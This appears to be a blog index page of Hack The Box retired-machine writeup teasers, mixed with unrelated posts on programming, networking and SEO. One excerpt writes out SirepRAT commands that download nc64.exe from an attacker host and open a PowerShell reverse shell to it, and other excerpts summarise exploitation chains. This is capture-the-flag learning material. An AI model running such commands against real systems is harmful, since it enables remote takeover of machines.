Hackthebox retired machine are those machines which are not active on the Hackthebox . But the good thing about the retired machines is that the writeups for hackthebox retired machines are available . So the beginners who are starting the CTF journey can read these writeups and get the idea how the machines are solved .
This machine involves scanning of ports which then leads to ipmi hashes leak. Then followed by subdomain enumeration and logging into zabbix account .Then getting reverse shell through command execution through zabbix
This box is a medium level box from the hackthebox .Which starts with the subdomain enumertion.And this using xss to get the teacher cookies …
It is a medium level machine from hackthebox which is great for learning new skills . It starts with the abusing of jwt token which leads to admin panel and which further leads to the www-shell . Then a little enumeration we get the ssh keys for the user. For privilege escalation sudo exploitation was enough and a little google gets the work done.
It is easy machine from hackthebox. Which includes little web directory enumeration which leads to password leaks. Then with the help of msfconsole we get initial shell . After some basic enumeration gets password for a ssh user. Followed by privilege escalation by abusing sudo rights in this it was
Selection Sort is one of the Simplest sorting algorithm out there.
It is an easy Linux machine .Nmap revels that it is running two ports only one is 22 and other 80. Nmap also revels that it is running Drupal 7 CMS.This was the initial foothold. After that we get MySQL creds leading to creds of a valid ssh user.Using snapd for Linux privilege escalation was interesting .
Checking for special symbol in a String in C Programming
Hibernate is a Java framework that simplifies the development of Java application to interact with the database
Introduction Steps Involved Port Scan python3 SirepRAT.py 10.10.10.204 LaunchCommandWithOutput –return_output –cmd “C:\Windows\System32\cmd.exe” –args “/c powershell Invoke-Webrequest -OutFile C:\nc64.exe -Uri http://10.10.14.20:8000/nc64.exe” –v python3 SirepRAT.py 10.10.10.204 LaunchCommandWithOutput –return_output –cmd “C:\Windows\System32\cmd.exe” –args “/c C:\nc64.exe 10.10.14.20 9001 -e powershell.exe” –v
Introduction It is a openBSD machine which has some directory enumeration and mostly all the steps are based on enumeration.Making the initial foothold may take time but over all a great machine . Steps involved 1-Port Scan 2-Enumerating website 3-Directory enumeration 4-Making of perfect payload 5-Getting reverse shell 6-Getting webapi_user password 7-Getting ssh keys for … Read more
It is a great machine from hackthebox .The OS is Linux it includes little web enumeration which leads to explotitaion of the New management system.Further enumeration gave the creds for the user .then switching amother user with some guess work.And privilege escalation by exploiting usb-creator
It is a great machine from hackthebox .It is Having BSD OS .which is very vulnerable .Starting with authentication bypass which gave the ssh-keys for a user .Then simple exploiting OPenBSD 6.6 vulnerabilities .
Academy is a great linux machine from the hackthebox platform.It is an easy machine which involves tampering of roleid to register as the admin and then get the dev subdomain.Which is followed by exploiting the app.
It was a great machine from hackthebox.It had only two ports open.And after testing the website got an error and got a CVE related to it .Rest was easy .For privilege escalation linpeas was enough.
Use 384##############5. use to unlock the writeup.
Introduction Column Details Name Sneakymailer IP 10.10.10.197 Points 30 Os Linux Difficulty Medium Creator Sulcud Out On 11 July 2020 Steps involved 1-Port Scan 2-Basic website enumeration 3-Sending Spoofed mail 4-Login into imap using paulbyrd creds and extracting mails 5-Login into ftp using developer creds 6-Uploading a Reverse shell through ftp 7-Subdomain enumeration 8-Getting shell … Read more
Java Servelt Examples for SQL operations | SQL connectivity …in this article the servelt codes and the html codes are given which can be easily reused.
The Question What the difference between 127.0.0.1 and 0.0.0.0 ? The Answer What is the Difference Between 127.0.0.1 and 0.0.0.0? 127.0.0.1 is the loopback address (also known as localhost). 0.0.0.0 is a non-routable meta-address used to designate an invalid, unknown, or non-applicable target (a ‘no particular address’ place holder). In the context of a route … Read more
Linux General ctrl + r Search History reverse Run Script at startup update-rc.d -f /path/to/the/script remove Delete Script from defaults Vim i for insert mode esc to leave insert mode To be continued with macros and all this handy shit Tmux Config from ippsec. First press the prefix ctrl + a, then release the buttons … Read more
There are many posts on internet for SEO tips but they keep on changing every year and then.So it is very necessary to be updated with them. Moreover the easiest way is to learn it your self and perform hit and trial methods . But we Know that every one now a days is running … Read more
